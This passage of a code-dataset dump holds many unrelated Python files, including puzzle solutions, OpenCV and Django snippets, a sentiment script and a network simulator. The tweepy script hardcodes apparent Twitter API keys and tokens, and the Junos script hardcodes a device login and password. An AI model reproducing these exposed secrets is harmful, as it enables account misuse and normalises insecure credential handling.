self.element.append(i)\n\n","sub_path":"webalchemy/widgets/basic/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"633266090","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the makeAnagram function below.\ndef makeAnagram(a, b):\n count = 0\n alphabet = [0] * 26\n for i in list(a):\n alphabet[ord(i) - 97] += 1\n for j in list(b):\n alphabet[ord(j) - 97] -= 1\n \n for i in range(len(alphabet)):\n count += abs(alphabet[i])\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n a = input()\n\n b = input()\n\n res = makeAnagram(a, b)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","sub_path":"Completed Code/MakeAnagram.py","file_name":"MakeAnagram.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"385037100","text":"Test_labels = []\nf = open('Test_labels.txt',\"r\")\nfor line in f:\n\tl = line.strip()\n\tTest_labels.append(l)\n\nPredicted_labels = []\nf = open('predicted_labels..txt',\"r\")\nfor line in f:\n\tl = line.strip()\n\tPredicted_labels.append(l)\n\nf1 = open('sarcastic_predictions.txt',\"w\")\nf2 = open('non_sarcastic_predictions.txt',\"w\")\nfor i in range(len(Test_labels)):\n\tif Test_labels[i] == 'nonsarcasm':\n\t\tf2.write(Predicted_labels[i])\n\t\tf2.write('\\n')\n\telse:\n\t\tf1.write(Predicted_labels[i])\n\t\tf1.write('\\n')\n\nf1.close()\nf2.close()\n\n","sub_path":"Systems/Numerical Sarcasm Detection/Machine Learning Experiments/KNN/exp_on_sentiment_punctuation_number/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"194397047","text":"# 穷举所有的子区间,对每个子区间进行求和\n# O(n^3) 子区间划分方法1:固定终点,起点从左往右走\n\n# 优化—有相同的前缀:sum[1,4]=sum[1,3]+nums[4]\n# O(n^2) 子区间划分方法2:固定起点,终点从起点往右走\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n length=len(nums)\n res=-2147483647\n # 子区间划分方法1\n # for i in range(length):\n # for j in range(i+1):\n # s=sum(nums,j,i)\n # res=max(res,s)\n\n # 子区间划分方法2\n for i in range(length):\n s=0\n for j in range(i,length):\n s+=nums[j]\n res=max(res,s)\n return res\n\n\n\n def sum(self,nums: List[int],left:int,right:int) ->int:\n res=0\n for i in range(left,right+1):\n res+=nums[i]\n return res\n","sub_path":"53.最大子序和/暴力【提示超时错误】.py","file_name":"暴力【提示超时错误】.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"203712847","text":"class Solution:\n \"\"\"\n @param nums: an integer array\n @param low: An integer\n @param high: An integer\n @return: nothing\n \"\"\"\n\n def partition2(self, nums, low, high):\n # write your code here\n if not nums or len(nums) < 2:\n return\n\n l, r = 0, len(nums) - 1\n i = 0\n while i <= r:\n if nums[i] < low:\n nums[l], nums[i] = nums[i], nums[l]\n l += 1\n i += 1\n elif nums[i] > high:\n nums[r], nums[i] = nums[i], nums[r]\n r -= 1\n else:\n i += 1","sub_path":"625_Partition Array II.py","file_name":"625_Partition Array II.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"630506742","text":"# import the necessary packages\nimport numpy as np\nimport argparse\nimport cv2\nimport sys\nimport time\n \n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-v\", \"--video\", help = \"path to the image\")\nargs = vars(ap.parse_args())\n \n# load the image\n# video = cv2.imread(args[\"video\"])\n\n# define the list of boundaries\nboundaries = [\n ([0,130,70], [20,255,230]),\n ([160,120,70], [180,255,255])\n \n\n\n #([17, 15, 100], [50, 56, 200]),\n #([86, 31, 4], [220, 88, 50]),\n #([25, 146, 190], [62, 174, 250]),\n #([103, 86, 65], [145, 133, 128])\n]\n\npressed = True\ndef mouse(event, x, y, flags, params):\n global pressed\n if event == cv2.EVENT_LBUTTONDOWN:\n pressed = True\n print(\"Left click %d,%d\" % (x,y))\n\n\nif __name__ == '__main__' :\n \n\n # Read video\n video = cv2.VideoCapture(args[\"video\"])#\"trimmed2_540p.mp4\")\n cv2.namedWindow(\"FrameAlfred\")\n cv2.setMouseCallback(\"FrameAlfred\", mouse)\n\n # Exit if video not opened.\n if not video.isOpened():\n print(\"Could not open video\")\n sys.exit()\n \n # Read first frame.\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n \n while True:\n # Read a new frame\n if (pressed == True):\n pressed = False\n for i in range(2):\n ok, frame = video.read()\n #frame = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV) # Convert to HSV\n frame = cv2.resize(frame,(960,540))\n\n if not ok:\n break\n \n # Start timer\n timer = cv2.getTickCount()\n \n # Update tracker\n #ok, bbox = tracker.update(frame)\n \n # Calculate Frames per second (FPS)\n fps = 20;#cv2.getTickFrequency() / (cv2.getTickCount() - timer);\n \n # Draw bounding box\n if ok:\n pass\n # Tracking success\n #p1 = (int(bbox[0]), int(bbox[1]))\n #p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n #cv2.rectangle(frame, p1, p2, (255,0,0), 2, 1)\n else :\n # Tracking failure\n cv2.putText(frame, \"Tracking failure detected\", (100,80), cv2.FONT_HERSHEY_SIMPLEX, 0.75,(0,0,255),2)\n \n\n\n\n\n\n # # loop over the boundaries\n # for (lower, upper) in boundaries:\n # # create NumPy arrays from the boundaries\n # lower = np.array(lower, dtype = \"uint8\")\n # upper = np.array(upper, dtype = \"uint8\")\n \n # # find the colors within the specified boundaries and apply\n # # the mask\n # mask = cv2.inRange(frame, lower, upper)\n # output = cv2.bitwise_and(frame, frame, mask = mask)\n\n # # convert the image to grayscale\n # gray_image = cv2.cvtColor(output, cv2.COLOR_BGR2GRAY)\n # ret,thresh = cv2.threshold(gray_image,0,255,0)\n # #output = thresh\n # #output = gray_image\n\n\n\n # # Motion tracking method 1\n # contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n # for c in contours:\n # # calculate moments for each contour\n # M = cv2.moments(c)\n \n # # calculate x,y coordinate of center\n # if M[\"m00\"] != 0:\n # cX = int(M[\"m10\"] / M[\"m00\"])\n # cY = int(M[\"m01\"] / M[\"m00\"])\n # cv2.circle(output, (cX, cY), 5, (255, 0, 0), -1)\n # else:\n # cX, cY = 0, 0\n \n\n \n # Display result\n output = frame\n cv2.imshow(\"FrameAlfred\", output)\n #np.hstack([frame, output]))\n #time.sleep(0.2)\n # Exit if ESC pressed\n k = cv2.waitKey(1) & 0xff\n if k == 27 : break\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"color-parser/bball_tracker.py","file_name":"bball_tracker.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"580748056","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\napp_name = \"article\"\n\nurlpatterns = [\n\n path('article/', views.detail, name=\"detail\"),\n path('', views.articles, name=\"articles\"),\n path('comment/', views.addComment, name=\"comment\"),\n path('update/', views.updateArticle, name=\"update\"),\n path('delete/', views.deleteArticle, name=\"delete\"),\n path('like/', views.like_post_article, name=\"like_post\"),\n path('favourite_post/', views.favourite_post, name=\"favourite_post\"),\n path('favourite_list/', views.favourite_list, name=\"favourite_list\"),\n path('science/', views.category_science, name=\"category_science\"),\n path('culture/', views.category_culture, name=\"category_culture\"),\n path('technology/', views.category_technology, name=\"category_technology\"),\n path('art/', views.category_art, name=\"category_art\"),\n path('sport/', views.category_sport, name=\"category_sport\"),\n path('editordashboard/', views.dashboard, name=\"dashboard\"),\n path('addarticle/', views.addArticle, name=\"addArticle\"),\n\n]\n","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220466697","text":"from dbcon import *\nimport numpy as np\nimport cv2\nimport csv\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\ncap = cv2.VideoCapture(0)\nrec = cv2.face_LBPHFaceRecognizer.create();\nrec.read(\"trainingdata.yml\")\npeople=list()\nid=0\nfont = cv2.FONT_HERSHEY_SIMPLEX\ndef liveVideo():\n while 1:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.5, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n id,conf=rec.predict(gray[y:y+h,x:x+w])\n #print(id)\n id=con(\"SELECT username FROM studentinfp WHERE id=%s\" %id)\n if id is None:\n id=\"Unknown\"\n cv2.putText(img,str(id),(x,y+h),font,2.0,(0,0, 255))\n if(id not in set(people)):\n attandace(id)\n people.append(id)\n cv2.imshow('img',img)\n if cv2.waitKey(1) == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n#liveVideo()","sub_path":"faceDETECTOR.py","file_name":"faceDETECTOR.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430035463","text":"from distutils.core import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"weixunsdkfrs\"\nNAME = \"WeixunSDKFrs\"\nDESCRIPTION = \"WeixunSDKFrs\"\nAUTHOR = \"Maple Liu\"\nAUTHOR_EMAIL = \"maple.liu@microfastup.com\"\nURL = \"http://github.com/weixunsdkfrs\"\nVERSION = __import__(PACKAGE).__version__\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n # long_description=read(\"README.md\"), \n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"Apache License, Version 2.0\",\n url=URL,\n packages=find_packages(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n) ","sub_path":"pypi_install_script/WeixunSDKFrs-0.1.20170213.1819.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"148667645","text":"import tweepy\nfrom textblob import TextBlob\nimport pandas as pd\nfrom IPython.display import display\n\n# Step 1 - Authenticate\nconsumer_key= 'dNltCHVvGCMe1tbOsd0uVyDzM'\nconsumer_secret= '6DDT94jq42cgokvXLYuvjOvUXtFLLG9OzDCPr40TmY5XkXy6C1'\n\naccess_token='2826897272-M9jhGCfKo3zjvZaya2XSnYzU9cLmbkHMrPJZMI1'\naccess_token_secret='E7PxcT8jriMkHBwE92kz5uzYYtMZQ84Yf3UnFd6EWjrH1'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\n#Step 3 - Retrieve Tweets\npublic_tweets = api.search('$amzn')\n# public_tweets = api.user_timeline(screen_name = 'realDonaldTrump', count = 200, include_rts = False)\n\npolarities = []\ntweets = []\nanalysis_results = []\n\nfor tweet in public_tweets:\n print(\"\")\n # print(tweet.text)\n print(\"\")\n #Step 4 Perform Sentiment Analysis on Tweets\n analysis = TextBlob(tweet.text)\n polarity = analysis.polarity\n polarities.append(polarity)\n # print(polarity)\n print(\"\")\n if polarity > .15:\n # print(\"positive\")\n sentiment = \"positive\"\n elif polarity < -.1:\n # print(\"negative\")\n sentiment = \"negative\"\n else:\n # print(\"neutral\")\n sentiment = \"neutral\"\n print(\"\")\n analysis_results.append((tweet.text, polarity, sentiment))\n # analysis_results.append(analysis_result)\n\n\nap = average_polarity = sum(polarities) / len(polarities)\nif(ap <= -.15):\n polarity_description = \"negative\"\nelif(ap > -.15 and ap <= 0):\n polarity_description = \"fairly negative\"\nelif(ap > 0 and ap <= 0.15):\n polarity_description = \"fairly positive\"\nelse:\n polarity_description = \"positive\"\nprint(\"The average polarity (sentiment) is \" + str(round(average_polarity,2)) + \", which is \" + polarity_description)\n\n\n\n\ndf = pd.DataFrame(analysis_results, columns= ['Tweet', 'Polarity', 'Sentiment'])\n# df.to_csv('/Users/ryanwhetstone/GoogleDrive/Python/test.csv',index=False)\n\ndisplay(df.head(10))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71090954","text":"__author__ = 'zhangxa'\nimport os\n\nfrom tornado import gen\nimport yaml\n\nfrom OpenSpider.concurrents.coroutine.runner import Runner\nfrom OpenSpider.resource.manager import ResourceManager\n\nclass WorkflowEngine(Runner):\n def __init__(self,workflows,**settings):\n self._workflows = workflows\n self._settings = settings\n\n '''\n We must define coroutine here,because every component in workflow should execute one by one.\n So the component class also should implement its execute method in a coroutine\n '''\n @gen.coroutine\n def run(self):\n input = None\n for component in self._workflows:\n lst = component.split('.')\n settings = {}\n cfg_file = os.path.join(lst[0],'cfg','httpworkflow',lst[-1]+'.yaml')\n if os.path.exists(cfg_file):\n with open(cfg_file,'r') as fin:\n settings = yaml.load(fin)\n cls_comp = ResourceManager.getResource(component)\n obj_comp = cls_comp(input,**settings)\n input = yield obj_comp.execute()\n\n def executeElements(self,workflow):\n for comp in workflow:\n comp.execute()","sub_path":"OpenSpider-master/workflow/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"224882328","text":"import pygame\nfrom pygame.sprite import Group\nfrom stats import Stats\nimport game_functions as gf\nfrom mario import Mario\nfrom settings import Settings\nfrom level import Level\nfrom pipe import Pipe\nfrom display import Display\nfrom map import Map\nfrom flag import Flag\nfrom pole import Pole\n\n\ndef run_game():\n pygame.init()\n settings = Settings()\n screen = pygame.display.set_mode((settings.screen_width, settings.screen_height))\n pygame.display.set_caption(\"Mario\")\n\n # Groups for sprites\n pipes = Group()\n secret_pipes = Group()\n bricks = Group()\n secret_bricks = Group()\n upgrades = Group()\n enemies = Group()\n poles = Group()\n flags = Group()\n\n stats = Stats()\n # Stores pipes for secret level in secret_pipes group\n for i in range(6, 8):\n pipe = Pipe(screen, settings, i)\n secret_pipes.add(pipe)\n\n # Create and initialize flag and pole before storing in group\n flag = Flag(screen, settings, stats)\n flags.add(flag)\n pole = Pole(screen, settings)\n poles.add(pole)\n\n mario = Mario(screen, settings, pipes, bricks, upgrades, stats, enemies, poles, secret_bricks, secret_pipes)\n lvl_map = None\n level = Level(screen, settings, pipes, bricks, upgrades, enemies, flags, poles)\n display = Display(screen, stats)\n\n while True:\n # Checks if Mario is in the main level and sets the map, generate the bricks, pipes, flags, and pole\n # Does this only once\n if stats.activate_main_lvl:\n lvl_map = Map(screen, settings, bricks, pipes, mario, enemies, upgrades, stats, secret_bricks)\n lvl_map.build_brick()\n # generate pipes and flag/pole\n for i in range(0, 6):\n pipe = Pipe(screen, settings, i)\n pipes.add(pipe)\n flag = Flag(screen, settings, stats)\n flags.add(flag)\n pole = Pole(screen, settings)\n poles.add(pole)\n stats.activate_main_lvl = False\n\n # Checks if Mario has activated the secret level and sets the map, clears all of the main level\n # Does this only once\n if stats.activate_secret:\n # Clears everything belonging to main level to prevent lag\n pipes.empty()\n bricks.empty()\n enemies.empty()\n poles.empty()\n flags.empty()\n lvl_map = Map(screen, settings, bricks, pipes, mario, enemies, upgrades, stats, secret_bricks)\n lvl_map.build_brick()\n\n stats.activate_secret = False\n stats.main_level = False\n\n if stats.game_active:\n gf.check_events(mario, stats)\n\n # If the player gets near the right side, shift the world left (-x)\n if mario.rect.right >= 600 and stats.main_level:\n diff = mario.rect.right - 600\n mario.rect.right = 600\n level.shifting_world(-diff)\n\n gf.update_screen(screen, mario, settings, level, pipes, display, stats, lvl_map, bricks, upgrades, enemies,\n flags, poles, secret_bricks, secret_pipes)\n pygame.display.flip()\n\n\nrun_game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346349383","text":"import constraint\n \n \nproblem = constraint.Problem()\n\n\nproblem.addVariables(\"TE\",range(1,10))\n\nproblem.addVariables(\"WOIGHLV\",range(10))\n\ndef o(t, e, w, o, i, g, h, l, v):\n\tif (t*100 + w*10 + o)*(t*100 + w*10 + o) + (e*10000 + i*1000 + g*100 + h*10 + t) == t*100000 + w*10000 + e*1000 + l*100 + v*10 + e:\n\t\treturn True\n\n\nproblem.addConstraint(o,\"TEWOIGHLV\")\n\nproblem.addConstraint(constraint.AllDifferentConstraint())\n\n\n\n\nresenja = problem.getSolutions()\n\nfor r in resenja:\n two = r['T']*100 + r['W']*10 + r['O']\n eight = r['E']*10000 + r['I']*1000 + r['G']*100 + r['H']*10 + r['T']\n twelve = r['T']*100000 + r['W']*10000 + r['E']*1000 + r['L']*100 + r['V']*10 + r['E']\n print( \"{0:d} * {1:d} + {2:d} = {3:d}\".format(two, two, eight, twelve))\n","sub_path":"ispiti/sabiranje.py","file_name":"sabiranje.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21683161","text":"def is_palindrome(x):\n\ts = str(x)\n\tn = 1 if len(s) % 2 == 0 else 0\n\tif s[:int(len(s)/2)] == s[-1:int(len(s)/2)-n:-1]:\n\t\treturn True\n\telse:\n\t\treturn False\n \ndef problem4(n):\n return max(set([i*j for i in range(n) for j in range(n) if is_palindrome(i*j)]))\n \nif __name__ == '__main__':\n print(problem4(999))","sub_path":"problem4/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"446851384","text":"from jnpr.junos import Device\nimport time\n\n\nstart_time = time.time()\n\nout=open(\"D:\\\\amr_ali\\python\\out.txt\",'w')\ndevices=\"D:\\\\amr_ali\\python\\devices.txt\"\nroutes=\"D:\\\\amr_ali\\python\\\\routes.txt\"\nwith open(routes,'r') as f:\n routes=f.readlines()\n routes=[x.strip() for x in routes]\n\nprint (routes)\n\nwith Device(host=\"10.212.0.26\", user=\"a.abdelwahab\", passwd=\"VGPxzbXV\", port=\"22\") as dev:\n for route in routes :\n data = dev.cli(\"show route \" + route + \" active-path detail table Mobile_Backhaul_2G_Central | find Protocol\")\n i = data.find(\"Protocol\")\n j = data.find(\"\\n\",i)\n\n # data1=dev.rpc.get_route_information(destination=route, detail=True, table='Mobile_Backhaul_2G_Central', active_path=True )\n\n out.write(data[i:j] + \" ->->\"+ route)\n out.write(\"\\n\")\n\n\n\n\nout.close()\n\n\nprint ( \"finished in %a sec.\" %(time.time()-start_time))\nprint (\" check data on following path \\\"D:\\\\amr ali\\python\\out.txt\\\"\")\n\n","sub_path":"scrept.py","file_name":"scrept.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"464864593","text":"list1 = [23, 79, 7, 8, 0, -2]\r\nlist2 = [3, 89, 88, 54, 13, 12]\r\n\r\noddList = []\r\nevenList = []\r\n\r\nfor num in list1:\r\n if(num%2!=0): oddList.append(num)\r\n\r\nfor num in list2:\r\n if(num%2==0): evenList.append(num)\r\n\r\nprint(f'First list : {list1}')\r\nprint(f'Odd list : {oddList}')\r\nprint(f'Second list : {list2}')\r\nprint(f'Even list : {evenList}')","sub_path":"python/Activity9.py","file_name":"Activity9.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"474814136","text":"import json\nimport re\n\n\n\nANSWER_MARGIN=50\nMAX_SEQ_LEN=512\n\ndef process_context(line):\n line = line.replace(\"·\", \"\", 100)\n spans = re.split('([,。])', line)\n if len(spans) <= 2:\n spans = re.split('([,。])', line)\n if len(spans) <= 2:\n spans = re.split('([;;,。,])', line)\n assert len(spans) > 2, spans\n # spans = [span for span in spans if len(span)>1]\n spans_sep = []\n for i in range(len(spans)//2):\n spans_sep.append(spans[2*i]+spans[2*i+1])\n assert len(spans_sep) > 0, spans\n return [[spans_sep[0],spans_sep]]\n\ndef supporting_facts(answers, context_lines):\n res = []\n idx = set()\n answers = list(set(answers))\n for i in range(len(context_lines)):\n for answer in answers:\n if context_lines[i].find(answer) != -1:\n if i not in idx:\n res.append([context_lines[0], i])\n idx.add(i)\n return res\n\n\n\n\nfor type in ['big_train_data','dev_ground_truth','test_ground_truth']:\n with open('2019_'+type+'.json', 'w', encoding='utf8') as fw:\n fin = open(type+'.json', 'r', encoding='utf8')\n line = fin.readline()\n dic = json.loads(line)\n results = []\n _id = 0\n for item in dic['data']:\n id = item['caseid']\n domain = item['domain']\n para = item['paragraphs'][0]\n context = para['context']\n casename = para['casename']\n qas = para['qas']\n for qa in qas:\n question = qa['question']\n qid = qa['id']\n is_unknown = qa['is_impossible']\n answers = qa['answers']\n\n ans_starts = [ans['answer_start'] for ans in answers]\n if len(ans_starts) > 0:\n answer_pos = min(ans_starts)\n else:\n answer_pos = 0\n\n if len(context)>MAX_SEQ_LEN:\n answer_start = min(answer_pos-ANSWER_MARGIN, len(context)-MAX_SEQ_LEN)\n answer_start = max(answer_start,0)\n answer_end = min(answer_start+MAX_SEQ_LEN, len(context))\n else:\n answer_start = 0\n answer_end = len(context)\n\n conv_dic = {}\n conv_dic['_id'] = _id\n conv_dic['context'] = process_context(context[answer_start:answer_end])\n conv_dic['question'] = question\n conv_dic['supporting_facts'] = []\n if is_unknown == \"true\":\n conv_dic['answer'] = \"unknown\"\n else:\n if answers[0]['text'] in [\"YES\",\"NO\"]:\n conv_dic['answer'] = answers[0]['text'].lower()\n else:\n conv_dic['answer'] = answers[0]['text']\n ans_spans = [answer['text'] for answer in answers]\n conv_dic['supporting_facts'] = supporting_facts(ans_spans, conv_dic['context'][0][1])\n results.append(conv_dic)\n _id+= 1\n fin.close()\n fw.write(json.dumps(results, ensure_ascii=False, indent=4))\nprint('FIN')","sub_path":"CAIL2020/ydljz(hong)/19dataset_convert.py","file_name":"19dataset_convert.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62574581","text":"import pickle\nfrom keras_frcnn.config import Config\n\n\ndef start():\n c=Config()\n with open('config_default_resnet.pickle', 'wb') as f:\n pickle.dump(c,f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"frcnn/create_config_pickle.py","file_name":"create_config_pickle.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"103633730","text":"import numpy\nimport cv2\nimport random\nm = cv2.imread('messi.jpg', 0) \n# will show the image in a window \nx,y=m.shape\nprint(x,y)\nt=numpy.transpose(m)\nm,n=t.shape\nprint(m,n)\n#print(t)\nasc=[]\ns='HELLO'\nfor i in s:\n asc.append(ord(i))\nprint(\"ASCII code of secret key is \",asc)\npos=[]\nfor a in asc:\n c=0\n loc=[]\n for i in range(m):\n for j in range(n):\n c=c+1\n if(a==t[i][j]):\n loc.append(c)\n pos.append(random.choice(loc))\n print(a,'is found ',len(loc),' times')\nprint(\"Final Position is \",pos)\np=[]\nfor a in pos:\n c=0\n #loc=[]\n for i in range(m):\n for j in range(n):\n c=c+1\n if(a==c):\n p.append(chr(t[i][j]))\nprint(\"Final Plain Text is\",''.join(p))\n \n \n \n","sub_path":"Image Encryption/ImageKey.py","file_name":"ImageKey.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"33994755","text":"## Problem3 (https://leetcode.com/problems/search-a-2d-matrix-ii/)\n#Time Complexity : O(m+n), m=number of rows and n=number of columns\n# Space Complexity : O(1) \n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\nclass Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if len(matrix)==0:\n return False\n m=len(matrix)\n n=len(matrix[0])\n i=0\n j=n-1;\n while(i=0):\n if matrix[i][j]==target:\n return True\n # if greater then you should move to smaller element in that list\n elif matrix[i][j]> target:\n j-=1\n else:\n i+=1\n return False\n \n \n \n \n ","sub_path":"Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"457764157","text":"import random\nfrom PIL import Image, ImageDraw\nfrom . import interpolation\n\ndef waveform(sound, filename=None, width=400, height=300, stroke=3, upsample_mult=5, upsample_x=20, show_axis=True):\n width *= upsample_mult\n height *= upsample_mult\n\n if filename is None:\n filename = 'waveform.png'\n\n x = range(width*upsample_x)\n\n img = Image.new('RGBA', (width, height), (255, 255, 255, 0))\n draw = ImageDraw.Draw(img)\n\n for channel in range(sound.channels):\n color = tuple([random.randint(0, 200) for _ in range(3)] + [200])\n points = [ sound[i][channel] for i in range(len(sound)) ]\n points = interpolation.linear(points, width*upsample_x)\n\n mapped_points = []\n for pos, point in zip(x, points):\n y = int(((point + 1) / 2) * (height - (stroke * 2)) + stroke)\n pos /= upsample_x\n mapped_points += [ (pos, y) ]\n #draw.ellipse((pos-stroke, y-stroke, pos+stroke, y+stroke), fill=color)\n draw.line(mapped_points, fill=color, width=stroke)\n\n if show_axis:\n draw.line((0, height/2, width, height/2), fill=(0,0,0,255), width=stroke//4)\n\n img.thumbnail((width//upsample_mult, height//upsample_mult))\n img.save(filename)\n\n","sub_path":"pippi/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230902608","text":"import random\nimport pickle\nfrom node2 import *\nfrom message2 import *\nfrom constants import *\n\nclass Network(object):\n def __init__(self):\n self.nodes = [] #list of nodes in network\n # self.epoch_it = 0 #keeps track of current Tau\n self.message_num = 0 #keeps track of available message ID numbers\n\n def add_node(self, node): #add node to network\n node.netID = len(self.nodes)\n self.nodes.append(node)\n\n def fill_network(self, num_nodes): #quickly fill network and randomly place nodes\n for i in range(num_nodes): #create and add nodes to network\n ide = str(i)\n node = Node(ide)\n node.load_pkl()\n self.add_node(node)\n\n def find_avg_energy_consumption(self, time):\n total_energy = 0\n\n for node in self.nodes:\n total_energy += node.energy\n\n avg_energy = total_energy / V\n\n f = open(path_to_folder + consumedEnergyFile, 'a')\n f.write(str(time) + \"\\t\" + str(avg_energy) + \"\\n\")\n f.close()\n\n def network_status(self): #console output for debugging (prints all messages in each nodes buffer)\n for i in range(len(self.nodes)):\n self.nodes[i].print_buf()\n print(\" \")\n\n #Get message size, path, spectrum info for the current message\n def get_message_info(self, path_lines, spec_lines, src, des, t, size):\n # print(\"Inside: \", src, des, t)\n path = []\n band = []\n for ind in range(len(path_lines)): # read each line from file to see if a new message needs to be generated\n path_line = path_lines[ind].strip()\n path_line_arr = path_line.split(\"\\t\")\n\n spec_line = spec_lines[ind].strip()\n spec_line_arr = spec_line.split(\"\\t\")\n\n if int(path_line_arr[2]) == int(t) and int(path_line_arr[0]) == int(src) and int(path_line_arr[1]) == int(\n des) and int(path_line_arr[3]) == int(size):\n # print (path_line_arr)\n path = path_line_arr[5: len(path_line_arr) - 1]\n band = spec_line_arr[5:]\n\n # print (path, band)\n return path, band\n\n\n def network_GO(self, t, specBW, path_lines, spec_lines, msg_lines, LINK_EXISTS): #function that sends all messages at a given tau\n\n if t % 15 == 0 or t == T - 1:\n self.find_avg_energy_consumption(t)\n\n for msg_id in range(len(msg_lines)):\n msg_line = msg_lines[msg_id].strip()\n msg_line_arr = msg_line.split(\"\\t\")\n\n if (int(msg_line_arr[5]) == t): # if a new message needs to be generated at this time\n # print(msg_line_arr)\n id = msg_line_arr[0]\n src = msg_line_arr[1] # get information from that line\n des = msg_line_arr[2]\n TTL = msg_line_arr[3]\n size = msg_line_arr[4]\n\n path, band = self.get_message_info(path_lines, spec_lines, src, des, t, size)\n\n message = Message(src, des, t, id, TTL, size, path, band, 0, 0, 0) # create the message\n curr = int(message.curr)\n\n # If a path exists for this message\n if len(message.path) > 0:\n # if len(message.path) + t >= 90:\n # print(\"Error 1: \", \" ID \", id, \" src: \", src, \" des: \", des, \" t \", t)\n\n self.nodes[curr].buf.append(message) # put the message in the source nodes buffer\n self.nodes[curr].buf_size += 1\n self.message_num += 1\n\n # else:\n # print(\"Error 2: \", \" ID \", id, \" src: \", src, \" des: \", des, \" t \", t)\n # print(\"Network Status -- Time: \", t) #console output for debugging\n # self.network_status()\n\n for i in range(len(self.nodes)): #send all messages to their next hop\n node = self.nodes[i]\n isVisited = len(node.buf) #Get the initial buffer size\n\n while len(node.buf) > 0 and isVisited > 0:\n msg = node.buf[ isVisited - 1]\n if msg.ID == debug_message:\n print(\"Curr:\", msg.curr, \"Path:\", msg.path)\n node.send_message( self, 